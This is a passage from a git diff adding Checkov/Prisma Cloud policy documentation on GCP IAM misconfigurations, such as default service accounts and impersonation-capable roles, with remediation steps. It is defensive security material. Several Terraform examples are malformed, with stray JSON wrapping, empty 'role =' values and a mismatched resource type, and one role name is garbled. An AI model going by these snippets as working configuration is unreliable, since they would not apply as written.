https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/ArtifactRegsitryEncryptedWithCMK.py[CKV_GCP_84] +|LOW + + +|xref:ensure-gcp-big-query-tables-are-encrypted-with-customer-supplied-encryption-keys-csek-1.adoc[GCP Big Query Datasets are not encrypted with Customer Supplied Encryption Keys (CSEK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/BigQueryDatasetEncryptedWithCMK.py[CKV_GCP_81] +|LOW + + +|xref:ensure-gcp-big-query-tables-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc[GCP Big Query Tables are not encrypted with Customer Supplied Encryption Keys (CSEK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/BigQueryTableEncryptedWithCMK.py[CKV_GCP_80] +|LOW + + +|xref:ensure-gcp-big-table-instances-are-encrypted-with-customer-supplied-encryption-keys-cseks.adoc[GCP Big Table Instances are not encrypted with Customer Supplied Encryption Keys (CSEKs)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/BigTableInstanceEncryptedWithCMK.py[CKV_GCP_85] +|LOW + + +|xref:ensure-gcp-cloud-build-workers-are-private.adoc[GCP cloud build workers are not private] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/CloudBuildWorkersArePrivate.py[CKV_GCP_86] +|LOW + + +|xref:ensure-gcp-cloud-storage-has-versioning-enabled.adoc[GCP Cloud storage does not have versioning enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/CloudStorageVersioningEnabled.py[CKV_GCP_78] +|LOW + + +|xref:ensure-gcp-data-flow-jobs-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc[GCP data flow jobs are not encrypted with Customer Supplied Encryption Keys (CSEK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/DataflowJobEncryptedWithCMK.py[CKV_GCP_90] +|LOW + + +|xref:ensure-gcp-data-fusion-instances-are-private.adoc[GCP data fusion instances are not private] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/DataFusionPrivateInstance.py[CKV_GCP_87] +|LOW + + +|xref:ensure-gcp-datafusion-has-stack-driver-logging-enabled.adoc[GCP DataFusion does not have stack driver logging enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/DataFusionStackdriverLogs.py[CKV_GCP_104] +|LOW + + +|xref:ensure-gcp-datafusion-has-stack-driver-monitoring-enabled.adoc[GCP DataFusion does not have stack driver monitoring enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/DataFusionStackdriverMonitoring.py[CKV_GCP_105] +|LOW + + +|xref:ensure-gcp-dataproc-cluster-is-encrypted-with-customer-supplied-encryption-keys-cseks.adoc[GCP Dataproc cluster is not encrypted with Customer Supplied Encryption Keys (CSEKs)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/DataprocClusterEncryptedWithCMK.py[CKV_GCP_91] +|LOW + + +|xref:ensure-gcp-kms-keys-are-protected-from-deletion.adoc[GCP KMS keys are not protected from deletion] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleKMSPreventDestroy.py[CKV_GCP_82] +|LOW + + +|xref:ensure-gcp-memorystore-for-redis-is-auth-enabled.adoc[GCP Memorystore for Redis has AUTH disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/MemorystoreForRedisAuthEnabled.py[CKV_GCP_95] +|MEDIUM + + +|xref:ensure-gcp-memorystore-for-redis-uses-intransit-encryption.adoc[GCP Memorystore for Redis does not use intransit encryption] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/MemorystoreForRedisInTransitEncryption.py[CKV_GCP_97] +|LOW + + +|xref:ensure-gcp-pubsub-topics-are-encrypted-with-customer-supplied-encryption-keys-csek.adoc[GCP Pub/Sub Topics are not encrypted with Customer Supplied Encryption Keys (CSEK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/CloudPubSubEncryptedWithCMK.py[CKV_GCP_83] +|LOW + + +|xref:ensure-gcp-resources-that-suppot-labels-have-labels.adoc[GCP resources that support labels do not have labels] +|CKV_GCP_CUSTOM_1 +|LOW + + +|xref:ensure-gcp-spanner-database-is-encrypted-with-customer-supplied-encryption-keys-cseks.adoc[GCP Spanner Database is not encrypted with Customer Supplied Encryption Keys (CSEKs)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/SpannerDatabaseEncryptedWithCMK.py[CKV_GCP_93] +|LOW + + +|xref:ensure-gcp-sql-database-uses-the-latest-major-version.adoc[GCP SQL database does not use the latest Major version] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/CloudSqlMajorVersion.py[CKV_GCP_79] +|LOW + + +|xref:ensure-gcp-subnet-has-a-private-ip-google-access.adoc[GCP subnet does not have a private IP Google access] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleSubnetworkPrivateGoogleEnabled.py[CKV_GCP_74] +|LOW + + +|xref:ensure-gcp-vertex-ai-datasets-use-a-customer-manager-key-cmk.adoc[GCP Vertex AI datasets do not use a Customer Manager Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/VertexAIDatasetEncryptedWithCMK.py[CKV_GCP_92] +|LOW + + +|xref:ensure-gcp-vertex-ai-metadata-store-uses-a-customer-manager-key-cmk.adoc[GCP Vertex AI Metadata Store does not use a Customer Manager Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/VertexAIMetadataStoreEncryptedWithCMK.py[CKV_GCP_96] +|LOW + + +|xref:ensure-that-cloud-kms-cryptokeys-are-not-anonymously-or-publicly-accessible.adoc[GCP KMS crypto key is anonymously accessible] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml[CKV2_GCP_6] +|HIGH + + +|xref:ensure-that-there-are-only-gcp-managed-service-account-keys-for-each-service-account.adoc[There are not only GCP-managed service account keys for each service account] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/ServiceAccountHasGCPmanagedKey.yaml[CKV2_GCP_3] +|LOW + + +|=== + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-1.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-1.adoc new file mode 100644 index 000000000..2da9afeee --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-1.adoc @@ -0,0 +1,109 @@ +== GCP VM instance configured with default service account + +=== Policy Details + +[width=45%] +[cols="1,1"] + +|=== +|Prisma Cloud Policy ID +| 68ab0618-0716-11eb-adc1-0242ac120002 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py[CKV_GCP_30] + +|Severity +|MEDIUM + +|Subtype +|Build +//Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +The default Compute Engine service account has Editor role on the project, allowing read and write access to most Google Cloud Services. +We recommend you configure your instance to not use the default Compute Engine service account. +You should create a new service account and assign only the permissions needed by your instance. +This helps defend against compromised VM privilege escalations and prevent an attacker from gaining access to all of your project. + +NOTE: The default Compute Engine service account is named: __[PROJECT_NUMBER]__-compute@developer.gserviceaccount.com. + + +//// +=== Fix - Runtime +* GCP Console To change the policy using the GCP Console, follow these steps:* + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/compute/instances [VM instances]. + +. Click on the instance name to go to its * VM instance details* page. + +. Click * STOP*, then click * EDIT*. + +. Under the section * Service Account*, select a service account. ++ +You may first need to create a new service account. ++ +[WARNING] +==== +Do not select the default Compute Engine service account. +==== + +. Click * Save* and then click * START*. + + +* CLI Command* + + + +. Stop the instance: +---- +gcloud compute instances stop INSTANCE_NAME +---- + +. Update the instance: +---- +gcloud compute instances set-service-account INSTANCE_NAME - +-serviceaccount=SERVICE_ACCOUNT +---- + +. Restart the instance: +---- +gcloud compute instances start INSTANCE_NAME +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_compute_instance +* *Field:* service_account +* *Arguments:* email = <email other than the default service_account's> + + +[source,go] +---- +resource "google_compute_instance" "default" { + name = "test" + machine_type = "n1-standard-1" + zone = "us-central1-a" ++ service_account { + scopes = ["userinfo-email", "compute-ro", "storage-ro"] +- email = "[PROJECT_NUMBER]-compute@developer.gserviceaccount.com" ++ email = "example@email.com" + } +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-10.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-10.adoc new file mode 100644 index 000000000..c532cb7bd --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-10.adoc @@ -0,0 +1,99 @@ +== GCP IAM primitive roles are in use + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1d700141-3d41-4bf3-8a7a-89684fb8b066 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py[CKV_GCP_49] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +The IAM role is an identity with specific permissions. +An IAM role is similar to an IAM user: it has a Google identity with permission policies that determine what the identity can and cannot do in Google Cloud. +Certain IAM roles contain permissions that enable a user with the role to impersonate or manage service accounts in a GCP project through IAM inheritance from a higher resource, i.e., project binding. + +We recommend you do not set IAM role bindings with known dangerous roles that enable impersonation at the project level. +The following roles enable identities to impersonate all service account identities within a project if the identity is granted the role at the project, folder, or organization level. + +The following list includes our current recommendations for dangerous roles, however, it is not exhaustive as permissions and roles change frequently. + +*Primitive Roles*: + +* roles/owner +* roles/editor + +*Predefined Roles*: + +* roles/iam.securityAdmin +* roles/iam.serviceAccountAdmin +* roles/iam.serviceAccountKeyAdmin +* roles/iam.serviceAccountUser +* roles/iam.serviceAccountTokenCreator +* roles/iam.workloadIdentityUser +* roles/dataproc.editor +* roles/dataproc.admin +* roles/dataflow.developer +* roles/resourcemanager.folderAdmin +* roles/resourcemanager.folderIamAdmin +* roles/resourcemanager.projectIamAdmin +* roles/resourcemanager.organizationAdmin +* roles/cloudasset.viewer +* roles/cloudasset.owner + +*Service Agent Roles*: + +Service agent roles should not be used for any identities other than the Google managed service account they are associated with. + +* roles/serverless.serviceAgent +* roles/dataproc.serviceAgent + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_project_iam_member google_project_iam_binding +* *Arguments:* role + + +[source,text] +---- +resource "google_project_iam_member" "example" { + project = "project/1234567" +- role = + member = "user:test@example-project.iam.gserviceaccount.com" +} +---- + +[source,text] +---- +resource "google_project_iam_binding" "example" { + project = "project/1234567" +- role = + members = [ + "user:test@example-project.iam.gserviceaccount.com", + ] +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-2.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-2.adoc new file mode 100644 index 000000000..88450ced6 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-2.adoc @@ -0,0 +1,125 @@ +== GCP VM instance using a default service account with full access to all Cloud APIs + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7e4e6196-4922-4efd-acb9-7a4afc1c379a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py[CKV_GCP_31] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +When an instance is configured with *Compute Engine default service account* with Scope *Allow full access to all Cloud APIs*, based on IAM roles assigned to the user(s) accessing Instance, it may result in privilege escalation. +For example, a user may have permission to perform cloud operations and API calls that they are not required to perform. +Along with the ability to optionally create, manage and use user managed custom service accounts, Google Compute Engine provides default service account *Compute Engine default service account* for an instances to access necessary cloud services. +*Project Editor* role is assigned to *Compute Engine default service account* for this service account to have almost all capabilities over all cloud services, except billing. +When *Compute Engine default service account* is assigned to an instance it can operate in three scopes: + +. *Allow default access*: Allows only minimum access required to run an Instance (Least Privileges). + +. *Allow full access to all Cloud APIs*: Allows full access to all the cloud APIs/Services (too much access). + +. *Set access for each API*: Allows Instance administrator to choose only those APIs that are needed to perform specific business functionality expected by instance. ++ +We recommend you do not assign instances to default service account *Compute Engine default service account* with Scope *Allow full access to all Cloud APIs*. ++ +This supports the principle of least privileges and helps prevent potential privilege escalation, + +//// +=== Fix - Runtime + + +* GCP Console To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/compute/instances [VM instances]. + +. Select the impacted VM instance. + +. If the instance is not stopped, click * Stop*. ++ +Wait for the instance to stop. + +. Click * Edit*. + +. Scroll down to the * Service Account* section. + +. Select a different service account or ensure * Allow full access to all Cloud APIs* is not selected. + +. To save your changes, click * Save*. + +. Click * START*. + + +* CLI Command* + + + +. Stop the instance: +---- +gcloud compute instances stop INSTANCE_NAME +---- + +. Update the instance: +---- +gcloud compute instances set-service-account INSTANCE_NAME +--serviceaccount=SERVICE_ACCOUNT +--scopes [SCOPE1, SCOPE2...] +---- + +. Restart the instance: +---- +gcloud compute instances start INSTANCE_NAME +---- +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_compute_instance +* *Field:* service_account +* *Arguments:* If** email** is set to the default service account, or not specified, *scope* should not contain full access api. + + +[source,go] +---- +{ + "resource "google_compute_instance" "default" { + name = "test" + machine_type = "n1-standard-1" + zone = "us-central1-a" + service_account { +- scopes = ["https://www.googleapis.com/auth/cloud-platform"] +- email = "[PROJECT_NUMBER]-compute@developer.gserviceaccount.com"" + } + +}", +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-3.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-3.adoc new file mode 100644 index 000000000..46811c96a --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-3.adoc @@ -0,0 +1,105 @@ +== GCP IAM user are assigned Service Account User or Service Account Token creator roles at project level + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| a74559b6-54e1-41ad-9ac3-cd7f838e8c18 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py[CKV_GCP_41] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +A service account is a special Google account that belongs to an application or a VM, instead of to an individual end-user. +Application/VM-Instance uses the service account to call the service's Google API so that end-users are not directly involved. +The service account resource has IAM policies attached to it to determine who can use the service account. +Users with IAM roles to update the *App Engine* and *Compute Engine* instances, such as *App Engine Deployer* and *Compute Instance Admin*, can run code as the service accounts used to run these instances. + +This enables users to indirectly gain access to resources for which the service accounts have access. +Similarly, SSH access to a *Compute Engine* instance may also provide the ability to execute code as that instance/Service account. +Your organization may have multiple user-managed service accounts configured for a project. +Granting the** iam.serviceAccountUser *or **iam.serviceAserviceAccountTokenCreatorccountUser* roles to a user for a project gives the user access to all service accounts in the project, including service accounts created in the future. + +This can result in elevation of privileges by using service accounts and corresponding *Compute Engine* instances. +To implement least privileges best practices, IAM users should not be assigned the *Service Account User* or *Service Account Token Creator* roles at the project level. +These roles should be assigned to a user for a specific service account, giving that user access to the service account. + +The *Service Account User* allows a user to bind a service account to a long-running job service. +The *Service Account Token Creator* role allows a user to directly impersonate, or assert, the identity of a service account. +We recommend you assign the Service Account User (iam.serviceAccountUser) and Service Account Token Creator *iam.serviceAccountTokenCreator* roles to a user for a specific service account rather than assigning the role to a user at project level. + +//// +=== Fix - Runtime + + +* GCP Console To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/compute/iam-admin/iam [IAM Admin]. + +. Click on the filter table text bar. ++ +Type: _Role: Service Account User_ + +. Click the * Trash* icon in front of the role * Service Account User* for every user listed as a result of a filter. + +. Click on the filter table text bar. ++ +Enter _Role: Service Account Token Creator_ + +. Click the * Trash* icon in front of the role * Service Account Token Creator* for every user listed as a result of a filter. + + +* CLI Command* + + + +. Using a text editor, remove the bindings with * roles/iam.serviceAccountUser* and * roles/iam.serviceAccountTokenCreator*. + +. Update the project's IAM policy: `gcloud projects set-iam-policy PROJECT_ID iam.json`. + +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_project_iam_binding google_project_iam_member +* *Arguments:* role + + +[source,go] +---- +{ + "resource "google_project_iam_binding" "project" { + project = "your-project-id" +- role = "roles/iam.serviceAccountTokenCreator" +- role = "roles/iam.serviceAccountUser" +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-4.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-4.adoc new file mode 100644 index 000000000..781b68f80 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-4.adoc @@ -0,0 +1,120 @@ +== GCP IAM Service account does have admin privileges + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5bf5b89b-ebc3-4d84-858d-d1c0dbc4b61d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleProjectAdminServiceAccount.py[CKV_GCP_42] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + +//// +Bridgecrew +Prisma Cloud +* GCP IAM Service account does have admin privileges* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5bf5b89b-ebc3-4d84-858d-d1c0dbc4b61d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleProjectAdminServiceAccount.py[CKV_GCP_42] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== +//// + + +=== Description + + +A service account is a special Google account that belongs to an application or a VM, not to an individual end-user. +The application uses the service account to call the service's Google API so that users are not directly involved. +Service accounts represent service-level security of application or VM Resources, determined by the roles assigned to them. +Enrolling *ServiceAccount* with Admin rights gives full access to an assigned application or a VM. +A ServiceAccount Access holder can perform critical actions, such as delete and update change settings, without user intervention. +We recommend you do not grant Admin privileges for *ServiceAccount*. + +//// +=== Fix - Runtime + + +* GCP Console To change the policy using the GCP Console, follow these steps:* + + + +. Log in to the GCP Console at https://console.cloud.google.com. + +. Navigate to https://console.cloud.google.com/iam-admin/iam [IAM Admin]. + +. Navigate to * Members*. + +. Identify * User-Managed user created* service account with roles containing * __Admin** or **__admin* or roles matching * Editor* or * Owner*. + +. Click the * Trash* icon to remove the role from the member. ++ +In this case service account. + + +* CLI Command* + + + +. Using a text editor, remove * Role* that contains * roles/__Admin** or **roles/__admin* or matches * roles/editor* or * roles/owner*. ++ +Add a role to the bindings array that defines the group members and the role for those members. + +. Update the project's IAM policy: `gcloud projects set-iam-policy PROJECT_ID iam.json` +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_project_iam_member +* *Arguments:* role + member + + +[source,go] +---- +{ + "resource "google_project_iam_member" "project" { + project = "your-project-id" +- role = "roles/owner" +- member = "user:test@example-project.iam.gserviceaccount.com" +}", + +} +---- + diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-5.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-5.adoc new file mode 100644 index 000000000..e76325b89 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-5.adoc @@ -0,0 +1,98 @@ +== Roles impersonate or manage Service Accounts used at folder level + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 4adc9593-2094-47a4-8810-c359d3cfd88d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py[CKV_GCP_44] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +The IAM role is an identity with specific permissions. +An IAM role is similar to an IAM user: it has a Google identity with permission policies that determine what the identity can and cannot do in Google Cloud. +Certain IAM roles contain permissions that enable a user with the role to impersonate or manage service accounts in a GCP folder through IAM inheritance from a higher resource, i.e., folder binding. + +We recommend you do not set IAM role bindings with known dangerous roles that enable impersonation at the folder level. + +The following roles enable identities to impersonate all service account identities within a project if the identity is granted the role at the project, folder, or organization level. + +The following list includes our *current* recommendations for dangerous roles, however, it is not exhaustive as permissions and roles change frequently. + +*Primitive Roles*: +* roles/owner +* roles/editor + +*Predefined Roles*: + +* roles/iam.securityAdmin +* roles/iam.serviceAccountAdmin +* roles/iam.serviceAccountKeyAdmin +* roles/iam.serviceAccountUser +* roles/iam.serviceAccountTokenCreator +* roles/iam.workloadIdentityUser +* roles/dataproc.editor +* roles/dataproc.admin +* roles/dataflow.developer +* roles/resourcemanager.folderAdmin +* roles/resourcemanager.folderIamAdmin +* roles/resourcemanager.projectIamAdmin +* roles/resourcemanager.organizationAdmin +* roles/cloudasset.viewer +* roles/cloudasset.owner + +*Service Agent Roles*: + +Service agent roles should not be used for any identities other than the Google managed service account they are associated with. + +* roles/serverless.serviceAgent +* roles/dataproc.serviceAgent + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_folder_iam_member google_folder_iam_binding +* *Arguments:* role + + +[source,text] +---- +resource "google_folder_iam_member" "example" { + folder = "folders/1234567" +- role = + member = "user:test@example-project.iam.gserviceaccount.com" +} +---- + +[source,text] +---- +resource "google_folder_iam_binding" "example" { + folder = "folders/1234567" +- role = + members = [ + "user:test@example-project.iam.gserviceaccount.com", + ] +} +---- \ No newline at end of file diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-6.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-6.adoc new file mode 100644 index 000000000..a8935b182 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-6.adoc @@ -0,0 +1,99 @@ +== Roles impersonate or manage Service Accounts used at organizational level + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| ba6652a8-c848-494f-8f8d-1e8b908b667d + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py[CKV_GCP_45] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + +=== Description + + +The IAM role is an identity with specific permissions. +An IAM role is similar to an IAM user: it has a Google identity with permission policies that determine what the identity can and cannot do in Google Cloud. + +Certain IAM roles contain permissions that enable a user with the role to impersonate or manage service accounts in a GCP folder through IAM inheritance from a higher resource, i.e., folder binding. + +We recommend you do not set IAM role bindings with known dangerous roles that enable impersonation at the organizational level. + +The following roles enable identities to impersonate all service account identities within a project if the identity is granted the role at the project, folder, or organization level. +The following list includes our *current* recommendations for dangerous roles, however, it is not exhaustive as permissions and roles change frequently. + +*Primitive Roles*: + +* roles/owner +* roles/editor + +*Predefined Roles*: + +* roles/iam.securityAdmin +* roles/iam.serviceAccountAdmin +* roles/iam.serviceAccountKeyAdmin +* roles/iam.serviceAccountUser +* roles/iam.serviceAccountTokenCreator +* roles/iam.workloadIdentityUser +* roles/dataproc.editor +* roles/dataproc.admin +* roles/dataflow.developer +* roles/resourcemanager.folderAdmin +* roles/resourcemanager.folderIamAdmin +* roles/resourcemanager.projectIamAdmin +* roles/resourcemanager.organizationAdmin +* roles/cloudasset.viewer +* roles/cloudasset.owner + +*Service Agent Roles*: + +Service agent roles should not be used for any identities other than the Google managed service account they are associated with. + +* roles/serverless.serviceAgent +* roles/dataproc.serviceAgent + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_organization_iam_member google_organization_iam_binding +* *Argument:* role + + +[source,text] +---- +{ +resource "google_organization_iam_member" "example" { + org_id = "your-org-id" +- role = + member = "user:test@example-project.iam.gserviceaccount.com" +} +---- + +[source,text] +---- +resource "google_project_iam_binding" "example" { + org_id = "your-org-id" +- role = + members = [ + "user:test@example-project.iam.gserviceaccount.com", + ] +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-7.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-7.adoc new file mode 100644 index 000000000..d28f9c296 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-7.adoc @@ -0,0 +1,106 @@ +== Default Service Account is used at project level + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6c154645-4580-48e4-a136-30612b5da14f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py[CKV_GCP_46] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + +//// +Bridgecrew +Prisma Cloud +* Default Service Account is used at project level* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6c154645-4580-48e4-a136-30612b5da14f + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py [CKV_GCP_46] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== +//// + + +=== Description + + +A service account is a special Google account that belongs to an application or a VM, not to an individual end-user. +The application uses the service account to call the service's Google API so that users are not directly involved. +Service accounts represent service-level security of application or VM Resources, determined by the roles assigned to them. +The use of Default service accounts should be avoided, see below for details. +We recommend you do not set IAM role bindings using the default Compute Engine and App Engine service account. + +* *Default Compute Engine Service Account*: Used by GKE, Compute, DataProc, DataFlow, Composer. +* *project-number-compute@developer.gserviceaccount.com* +* *Default Appspot Service Account*: Used by App Engine, Cloud Functions, App Engine based services. +* *project-id@appspot.gserviceaccount.com* + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* google_project_iam_member google_project_iam_binding +* *Arguments:* member + + +[source,go] +---- +{ + "resource "google_project_iam_member" "project" { + project = "project/1234567" + role = "roles/owner" +- member = "project-number-compute@developer.gserviceaccount.com" +- member = "project-id@appspot.gserviceaccount.com" +}", + + "name": "google_project_iam_member" + }, + + { + "code": "resource "google_project_iam_member" "project" { + project = "project/1234567" + role = "roles/owner" +- members = [ + "project-number-compute@developer.gserviceaccount.com", + "project-id@appspot.gserviceaccount.com" + ] +}", + + "name": "google_project_iam_binding" +} +---- diff --git a/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-8.adoc b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-8.adoc new file mode 100644 index 000000000..075e43d49 --- /dev/null +++ b/code-security/policy-reference/google-cloud-policies/google-cloud-iam-policies/bc-gcp-iam-8.adoc @@ -0,0 +1,105 @@ +== Default Service Account is used at organization level + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 399fd728-52cd-42a8-8ed1-3b23b38651d5 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py[CKV_GCP_47] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + +//// +Bridgecrew +Prisma Cloud +* Default Service Account is used at organization level* + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 399fd728-52cd-42a8-8ed1-3b23b38651d5 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py [CKV_GCP_47] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== +//// + + +=== Description + + +A service account is a special Google account that belongs to an application or a VM, not to an individual end-user. +The application uses the service account to call the service's Google API so that users are not directly involved. +Service accounts represent service-level security of application or VM Resources, determined by the roles assigned to them. +The use of Default service accounts should be avoided, see below for details. +We recommend you do not set IAM role bindings using the default Compute Engine and App Engine service account. +*Default Compute Engine Service Account*: Used by GKE, Compute, DataProc, DataFlow, Composer. +*project-number-compute@developer.gserviceaccount.com* +*Default Appspot Service Account*: Used by App Engine, Cloud Functions, App Engine based services. 